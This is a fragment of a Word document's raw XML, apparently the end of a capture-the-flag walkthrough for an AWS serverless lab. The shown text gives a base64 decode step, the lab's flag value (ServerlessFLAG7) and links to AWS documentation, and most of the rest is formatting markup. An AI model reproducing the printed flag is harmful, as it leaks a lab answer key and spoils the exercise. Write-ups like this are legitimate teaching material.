                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="512593CE" w14:textId="296DC857" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="083692C6" w14:textId="77777777" w:rsidR="001F3CA3" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The cipher was decrypted successfully, the base64 encoded plaintext was returned. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFB43EA" w14:textId="77777777" w:rsidR="001F3CA3" w:rsidRDefault="001F3CA3" w:rsidP="0094232C"/>
    <w:p w14:paraId="4B904503" w14:textId="6D01EFEE" w:rsidR="005B3BFE" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 59: ​Decode the base64 text. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B09DD" w14:textId="33CC9C2D" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="005B3BFE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Command: ​echo OWU3Zjk3OGZkMTMyNGEwOTcxNWNhYjJmOTE2ZDRhOGM= | base64 -d </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65882A53" w14:textId="77777777" w:rsidR="005B3BFE" w:rsidRDefault="005B3BFE" w:rsidP="0094232C"/>
    <w:p w14:paraId="6429FDC5" w14:textId="540FF451" w:rsidR="00C25619" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">ServerlessFLAG7: ​9e7f978fd1324a09715cab2f916d4a8c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031C9A4D" w14:textId="77777777" w:rsidR="0018153B" w:rsidRDefault="0018153B" w:rsidP="0094232C"/>
    <w:p w14:paraId="2CA90074" w14:textId="5CA10A34" w:rsidR="00C25619" w:rsidRDefault="00C25619" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page49image66269584" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07292E62" wp14:editId="51E5169B">
            <wp:extent cx="5731510" cy="584200"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="12700"/>
            <wp:docPr id="8" name="Picture 8" descr="page49image6626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age49image6626958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584200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29115B30" w14:textId="77777777" w:rsidR="00C25619" w:rsidRDefault="00C25619" w:rsidP="0094232C"/>
    <w:p w14:paraId="57863122" w14:textId="39F95119" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="IntenseReference"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="IntenseReference"/>
        </w:rPr>
        <w:t xml:space="preserve">References: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5217DAFD" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">API Gateway (​​https://aws.amazon.com/api-gateway​​) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838FC7D" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Lambda (​​https://aws.amazon.com/lambda​​) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3B4CC8" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">AWS CLI (​​https://aws.amazon.com/cli​​) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD7AC9" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">API Gateway Reference (​https://docs.aws.amazon.com/cli/latest/reference/apigateway/​) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655C3A99" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Lambda Reference (​https://docs.aws.amazon.com/cli/latest/reference/lambda​) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E40E7A9" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">KMS Reference (​https://docs.aws.amazon.com/cli/latest/reference/kms​) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03FD56" w14:textId="236EAC52" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="75944D99" w14:textId="77777777" w:rsidR="0094232C" w:rsidRDefault="0094232C"/>
    <w:sectPr w:rsidR="009423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D562B1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52026F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A948F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1E62A4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78444F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978651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38847B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F426E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8B28F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244D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631EBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6896D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8E2A21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC461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B0D3CC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C083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F56DB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA787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8926452">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1415932432">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1507091960">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1422527861">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1441486795">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="709718963">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2038196718">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1447850945">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1355612656">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="217279714">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="851802351">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1060134143">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1812744143">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="10323455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32C"/>
    <w:rsid w:val="00017AEE"/>
    <w:rsid w:val="00027484"/>
    <w:rsid w:val="000671FB"/>
    <w:rsid w:val="00075F86"/>
    <w:rsid w:val="000A6D95"/>
    <w:rsid w:val="000D3E2D"/>
    <w:rsid w:val="000E7394"/>
    <w:rsid w:val="000F0C98"/>
    <w:rsid w:val="001010C9"/>
    <w:rsid w:val="0018153B"/>
    <w:rsid w:val="001F3CA3"/>
    <w:rsid w:val="0020432A"/>
    <w:rsid w:val="00242257"/>
    <w:rsid w:val="002D6916"/>
    <w:rsid w:val="0033705D"/>
    <w:rsid w:val="003421DF"/>
    <w:rsid w:val="00356C40"/>
    <w:rsid w:val="003700BC"/>
    <w:rsid w:val="00376F79"/>
    <w:rsid w:val="00445766"/>
    <w:rsid w:val="004B3096"/>
    <w:rsid w:val="004B47BD"/>
    <w:rsid w:val="004E7BA1"/>
    <w:rsid w:val="00505E0D"/>
    <w:rsid w:val="00510C83"/>
    <w:rsid w:val="005258E4"/>
    <w:rsid w:val="00533548"/>
    <w:rsid w:val="00545BC6"/>
    <w:rsid w:val="00553C52"/>
    <w:rsid w:val="0058333B"/>
    <w:rsid w:val="005B3BFE"/>
    <w:rsid w:val="005C0257"/>
    <w:rsid w:val="005E2BD8"/>
    <w:rsid w:val="00661E5F"/>
    <w:rsid w:val="006642D5"/>
    <w:rsid w:val="00676B3E"/>
    <w:rsid w:val="00683D39"/>
    <w:rsid w:val="006A7900"/>
    <w:rsid w:val="006F2761"/>
    <w:rsid w:val="007368E3"/>
    <w:rsid w:val="00767960"/>
    <w:rsid w:val="007870F2"/>
    <w:rsid w:val="007A41C1"/>
    <w:rsid w:val="007A7AA0"/>
    <w:rsid w:val="007B4A06"/>
    <w:rsid w:val="00833044"/>
    <w:rsid w:val="00837C51"/>
    <w:rsid w:val="008A3F2C"/>
    <w:rsid w:val="008B588B"/>
    <w:rsid w:val="00936B3A"/>
    <w:rsid w:val="00940ED1"/>
    <w:rsid w:val="0094232C"/>
    <w:rsid w:val="009B3034"/>
    <w:rsid w:val="009B30EC"/>
    <w:rsid w:val="009C6E68"/>
    <w:rsid w:val="009E55A4"/>
    <w:rsid w:val="00A00752"/>
    <w:rsid w:val="00A507C5"/>
    <w:rsid w:val="00A92918"/>
    <w:rsid w:val="00B26130"/>
    <w:rsid w:val="00B9596B"/>
    <w:rsid w:val="00BB096B"/>
    <w:rsid w:val="00C25619"/>
    <w:rsid w:val="00CA2D4C"/>
    <w:rsid w:val="00CC4E42"/>
    <w:rsid w:val="00CC5D59"/>
    <w:rsid w:val="00CE0C96"/>
    <w:rsid w:val="00D55784"/>
    <w:rsid w:val="00D66075"/>
    <w:rsid w:val="00DB2CF2"/>
    <w:rsid w:val="00DC0D5C"/>
    <w:rsid w:val="00DC252B"/>
    <w:rsid w:val="00DE0AD7"/>
    <w:rsid w:val="00DE67AE"/>
    <w:rsid w:val="00DF3224"/>
    <w:rsid w:val="00E80E5B"/>
    <w:rsid w:val="00E83E2C"/>
    <w:rsid w:val="00EA2F97"/>
    <w:rsid w:val="00EA4ABF"/>
    <w:rsid w:val="00EB3B27"/>
    <w:rsid w:val="00F13EDE"/>
    <w:rsid w:val="00F21352"/>
    <w:rsid w:val="00F706D5"/>
    <w:rsid w:val="00F932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2C010"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9B4B4B61-9053-A14A-92F5-F80A8897A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232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94232C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0094232C"/>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94232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C5D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D59"/>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CC4E42"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00CC4E42"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="00CC4E42"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A6D95"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004B3096"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006F2761"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F2761"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Closing">
    <w:name w:val="Closing"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ClosingChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F2761"/>
    <w:pPr>
      <w:ind w:left="4252"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ClosingChar">
    <w:name w:val="Closing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Closing"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006F2761"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F2761"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006F2761"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLTypewriter">
    <w:name w:val="HTML Typewriter"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F2761"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F2761"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLSample">
    <w:name w:val="HTML Sample"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E55A4"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consola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151448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1573854692">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="123164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20158">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1067844679">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1288976401">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="41249471">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1759597757">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="7952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2990">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1156073493">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="990909104">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="133065400">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="887649156">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="19418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320710">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2013678264">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="560749537">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="782264124">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="685911515">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="2100061345">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="4551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719136">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1828091174">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="18359205">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="441070265">
